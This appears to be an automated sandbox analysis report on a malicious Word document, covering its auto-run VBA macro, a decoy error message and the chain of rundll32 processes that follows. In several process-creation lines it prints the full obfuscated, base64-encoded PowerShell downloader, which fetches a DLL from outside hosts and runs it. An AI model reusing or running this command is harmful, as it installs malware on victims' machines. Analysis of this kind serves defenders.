Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002388E5	11_2_002388E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002412E2	11_2_002412E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002426F5	11_2_002426F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002420C5	11_2_002420C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0023C0C6	11_2_0023C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002396CD	11_2_002396CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00248ADC	11_2_00248ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002442DA	11_2_002442DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0023F536	11_2_0023F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00240D33	11_2_00240D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0023BB3A	11_2_0023BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00240F0C	11_2_00240F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0023B112	11_2_0023B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00245D1D	11_2_00245D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00247F1F	11_2_00247F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0024511B	11_2_0024511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00237B63	11_2_00237B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00240B68	11_2_00240B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00241773	11_2_00241773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00238F78	11_2_00238F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00249B45	11_2_00249B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00248F49	11_2_00248F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00236754	11_2_00236754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0023B75F	11_2_0023B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002369A0	11_2_002369A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002473AC	11_2_002473AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002317AC	11_2_002317AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002461B8	11_2_002461B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00246DB9	11_2_00246DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00249586	11_2_00249586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0024878F	11_2_0024878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0023F98C	11_2_0023F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00237998	11_2_00237998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00236D9F	11_2_00236D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0023839D	11_2_0023839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00243FE7	11_2_00243FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0023D7EB	11_2_0023D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002471EF	11_2_002471EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002467E9	11_2_002467E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002463C1	11_2_002463C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00241BDF	11_2_00241BDF

Source: pack 2254794.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module Wm_t404p8v_, Function Document_open			Name: Document_open

Source: pack 2254794.doc

OLE indicator, VBA macros: true

Source: 00000005.00000002.2096095535.0000000000296000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2096289799.0000000001BD6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: O_5Z.dll.5.dr

Static PE information: Section: .rsrc ZLIB complexity 0.994955920298

Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@18/8@1/2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_00231C88 CreateToolhelp32Snapshot,

11_2_00231C88

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,

7_2_10002D70

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ck 2254794.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD0B6.tmp

Jump to behavior

Source: pack 2254794.doc

OLE indicator, Word Document stream: true

Source: pack 2254794.doc	OLE document summary: title field not present or empty
Source: pack 2254794.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ............K........................... ...............................x...............#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ............K...@...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K........t.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................p.j....................................}..v.....o......0...............................@...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................p.j..... ..............................}..v....Xp......0.................t.............@...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................ip.j....................................}..v.....}......0...............................@...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................ip.j......t.............................}..v.....}......0...............H.t.............@...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#................p.j....................................}..v....X.......0...............................@...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#................p.j..... ..............................}..v............0.................t.............@...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'................M.j....E...............................}..v....P&......0.................t.............@...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....+................M.j....E...............................}..v.....d......0.................t.............@...............	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL

Source: pack 2254794.doc	Virustotal: Detection: 30%
Source: pack 2254794.doc	ReversingLabs: Detection: 32%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Crppsin\fgsajt.gvd',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fohbyq\ikksw.jnv',Control_RunDLL
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Crppsin\fgsajt.gvd',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fohbyq\ikksw.jnv',Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2099168387.0000000002B87000.00000004.00000040.sdmp
